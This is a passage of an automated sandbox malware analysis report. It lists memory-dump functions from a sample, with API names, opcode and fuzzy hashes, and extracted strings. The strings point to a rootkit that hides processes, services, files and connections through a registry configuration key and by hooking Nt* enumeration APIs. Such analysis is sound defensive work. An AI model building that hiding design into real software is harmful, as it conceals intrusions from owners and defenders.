                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3733156554-0
                                                                                                      • Opcode ID: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
                                                                                                      • Instruction ID: d24e8cee81657e19729eb29018217baec0211f9e7804beeec7bf8cb7addf20ee
                                                                                                      • Opcode Fuzzy Hash: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
                                                                                                      • Instruction Fuzzy Hash: F7F0B235219E48C1D730EB45E4D17DA6BA1E3C87D4F540115BA8E4BB69CF78C5A48B00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction ID: 6b2c1a00b8653553ce2fa2490080446c6c80b7607cd630d56c9550ff24d4ad75
                                                                                                      • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction Fuzzy Hash: 62612976701A5597EF68CF95D4C07ADB7A2F704BD8F188011DE19877A6DB38E862CB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID: d<m{8
                                                                                                      • API String ID: 1239891234-753981864
                                                                                                      • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                      • Instruction ID: 502145cf45ececc98cc32d7896cfb3bf999c707c81610504cc38a0efc6f4cb61
                                                                                                      • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                      • Instruction Fuzzy Hash: 09316D32205F8486DB60CF75E8803EE77A5F798754F900116EA9D8BBA9DF38C665CB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                      • String ID: d<m{8
                                                                                                      • API String ID: 1443284424-753981864
                                                                                                      • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction ID: bd0f0f954f12952508b19c15c406acca69733a5ca454d35b34c978088a58b577
                                                                                                      • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction Fuzzy Hash: 51E1CE72614B849BE701CFA4D4C43EE7BB2F345788F948116EF4A5BB99DA34D52AC700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3140674995-0
                                                                                                      • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                      • Instruction ID: c5c876f0e343d0e1e91d5ea7ac371b6ddd6ac3699ed6d38c95a356382de5c7ef
                                                                                                      • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                      • Instruction Fuzzy Hash: 6A315272205F8496EB609FA0E8C07EE77A5F794744F84442ADA4D4BB99EF38C658C710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID: d<m{8
                                                                                                      • API String ID: 2933794660-753981864
                                                                                                      • Opcode ID: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
                                                                                                      • Instruction ID: cf439d4adb14c4de8e84c6fd09d963e57d922f91e9611456daab420cecf393ee
                                                                                                      • Opcode Fuzzy Hash: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
                                                                                                      • Instruction Fuzzy Hash: 6C112E32201F458BEB108FB0E8D53E437A4F759758F841A21EA6D4ABA4DB38D5A58380
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: d<m{8
                                                                                                      • API String ID: 0-753981864
                                                                                                      • Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                                                                                      • Instruction ID: 5d1982be9f2535ef4e9495990b23cdc29b18a9366a2425093dd46d9b840dc784
                                                                                                      • Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                                                                                      • Instruction Fuzzy Hash: 7A51F432705B9485F7209BB6A9807EE7FE6F785BD4F944214EE588BB95CB38C121CB00
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: *?$d<m{8
                                                                                                      • API String ID: 0-8612452
                                                                                                      • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                      • Instruction ID: 803e23ea5214624befed8409716cf61326d5ced8ada9b73e1add26e33854777b
                                                                                                      • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                      • Instruction Fuzzy Hash: B751A472712F9885EF14DFE698816ED6BB2F748BD8F844515EE198BB85EB38C461C300
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise
                                                                                                      • String ID:
                                                                                                      • API String ID: 3997070919-0
                                                                                                      • Opcode ID: 5bf784a0c32a6fdd6608718a34414416974ceff4d88edce5db5c7f7bc0fecdf2
                                                                                                      • Instruction ID: 452e227fce690c953d8bb3dc8348759480fa7b3692a5b68e12caac357261afc8
                                                                                                      • Opcode Fuzzy Hash: 5bf784a0c32a6fdd6608718a34414416974ceff4d88edce5db5c7f7bc0fecdf2
                                                                                                      • Instruction Fuzzy Hash: 1FB11E77610B888BEB15CF69C4C63AC7BA1F344B48F958915DB5D8B7A4CB35D461C700
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: *?
                                                                                                      • API String ID: 0-2564092906
                                                                                                      • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                      • Instruction ID: 1e1f1c287173ab96952c7d400842714987fb631c8e549e0f8343654fc5b33fd4
                                                                                                      • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                      • Instruction Fuzzy Hash: E551017A710F98A5EF14CFE6D8806ED2BA2F748BD4F444521EE1987B96EB78C461C700
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction ID: 0f4c0ad1586a76b8ecf092645be78aea22934e0f3240f4d66d18082c31dea149
                                                                                                      • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction Fuzzy Hash: E5E1057B714A84AAE700CFB5D4842DD7BB2F3457C8F544116DF4A9BBAADA34C42ACB00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction ID: cfe972f10855e67b7834016b969bd754bc800a709a1a43fc3ea7308fd4a11a20
                                                                                                      • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction Fuzzy Hash: 04B1C13A210E58A2EF549FA5D4C07E96BA6F744BC8F485016EE0D937A6DF39CD60CB40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5bf784a0c32a6fdd6608718a34414416974ceff4d88edce5db5c7f7bc0fecdf2
                                                                                                      • Instruction ID: af6f81f3fe1e2f7fade7f214ce2911a3dbd5a07a95afbe4fd348357636b7dcaa
                                                                                                      • Opcode Fuzzy Hash: 5bf784a0c32a6fdd6608718a34414416974ceff4d88edce5db5c7f7bc0fecdf2
                                                                                                      • Instruction Fuzzy Hash: 88B1707B600B98CBEB55CF69D48639C37A1F384B88F188912DB5E877A5CB79C461CB00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e95e74bf35bf9d925a6b7a4db2fe25d2d051f56200e857b6c163f6463b9713f3
                                                                                                      • Instruction ID: 1a607e1af956ba92901dce9887082fa44efb8006a8ec553f522e843b6fe88fa8
                                                                                                      • Opcode Fuzzy Hash: e95e74bf35bf9d925a6b7a4db2fe25d2d051f56200e857b6c163f6463b9713f3
                                                                                                      • Instruction Fuzzy Hash: 5E51A62792C27515D705BBBDB8856FEBF58CF8373174400F7E288C9487B9453A8682E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                                                                                      • Instruction ID: e634bdd9a47cdc48deb6309890f1b97a02d442f09301ee29ad7737adafb23816
                                                                                                      • Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                                                                                      • Instruction Fuzzy Hash: F9510536704B9464FB209BB6E8806DE7FA6B740BD4F144214EE5887BAACB78C521CB00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
                                                                                                      • Instruction ID: 6d6bd805ba37be457c298fac1e538c09b53a64c94c33d09313ebb7d363667251
                                                                                                      • Opcode Fuzzy Hash: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
                                                                                                      • Instruction Fuzzy Hash: AAF062B57146A89AEBA49F68B88275977E1F708384F848419D689C3B04D23C8070DF04
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 22443753de477045bc04e8fae9bbe208e9ed38c4b700908505935cb619c927f3
                                                                                                      • Instruction ID: c7ef1e30b7cabfc2fe9d54dffa2f8fdd7e4f37eed1b277cc189839f41bf51811
                                                                                                      • Opcode Fuzzy Hash: 22443753de477045bc04e8fae9bbe208e9ed38c4b700908505935cb619c927f3
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$CloseOpen$Process$Allocate$EnumFreeInfoQueryValuelstrlen
                                                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                      • API String ID: 194202978-2879589442
                                                                                                      • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                      • Instruction ID: 868e0d8b588af5acf42f02fcf6bcc45545a909e14d28c16c323a3b88dc37ace0
                                                                                                      • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                      • Instruction Fuzzy Hash: 04711A36711E5896EB149FB5E8D07E92BAAF788B88F805111DE4D8FBA8DF34C464C740
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Allocate$Free$EnumInfoQueryValuelstrlen
                                                                                                      • String ID: d
                                                                                                      • API String ID: 2772000396-2564639436
                                                                                                      • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                      • Instruction ID: f9d5bde1adb29034eadf19fb96c06b3b22d569f24bb093e8a420f7b069aa5f85
                                                                                                      • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                      • Instruction Fuzzy Hash: 14515F72215F4893EB14CFA2E5843EABBA6F788B80F848124DA494FB54DF38D165CB40
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                      • API String ID: 4175298099-1975688563
                                                                                                      • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                      • Instruction ID: 2bdbd3ac0d5721edcb9f8c439622c6a03af0ab73b38f1333d1df33f4cb6f0215
                                                                                                      • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                      • Instruction Fuzzy Hash: 1931C374252D4EB2EB04EFE5E8D26F43B23F794344FD054279509AE1A69F38927AC780
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: api-ms-$d<m{8$ext-ms-
                                                                                                      • API String ID: 190572456-1566161328
                                                                                                      • Opcode ID: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
                                                                                                      • Instruction ID: c9861b46f3ec394aefbc40d6bfd8c5fd7dd73ebf15f63bbf8f10e08c84c9c31a
                                                                                                      • Opcode Fuzzy Hash: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
                                                                                                      • Instruction Fuzzy Hash: F641D031712E8883FB218B96A8C47F92A93FB04BD0F8845259D099F3D4EB3CE4258280
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocateEnumFreeInfoQueryValue
                                                                                                      • String ID: d
                                                                                                      • API String ID: 1572912380-2564639436
                                                                                                      • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                      • Instruction ID: a8edd0ea4652e70612fafd38e2bcb13de47dfc8bae6f7a635e06821f06cecbde
                                                                                                      • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                      • Instruction Fuzzy Hash: 9C418233615F8497E7648FA1E4847EABBA6F388B84F408125DB894FB54DF38D164CB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                      • Instruction ID: 9419b912e4ce57f2ed3f519e8da04bc0e4f1344d6927a75c50027208998938d2
                                                                                                      • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                      • Instruction Fuzzy Hash: 8931B231203E4891EF12DF96A4807F96A95F748BA4F994525AD6D8E384DF38C065C700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 517849248-0
                                                                                                      • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                      • Instruction ID: 5565b372dfcfde617a1e1899568ad11a3411a5107f78f50ac7e11b9e160b5a31
                                                                                                      • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                      • Instruction Fuzzy Hash: 2E013C31300E4996EB149B62A4D83E96BA6F788FC4FC84135CE494B794DF3CD5958700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
